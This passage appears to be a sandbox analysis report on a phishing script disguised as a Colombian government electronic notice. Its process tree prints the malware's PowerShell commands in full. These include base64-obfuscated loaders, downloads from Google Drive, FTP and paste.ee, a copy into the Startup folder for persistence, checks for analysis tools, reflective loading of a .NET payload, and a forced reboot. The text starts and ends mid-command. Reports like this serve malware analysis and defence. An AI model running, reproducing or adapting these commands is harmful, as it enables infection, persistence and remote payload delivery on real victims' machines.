'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:780
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:840
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1672
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:2484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 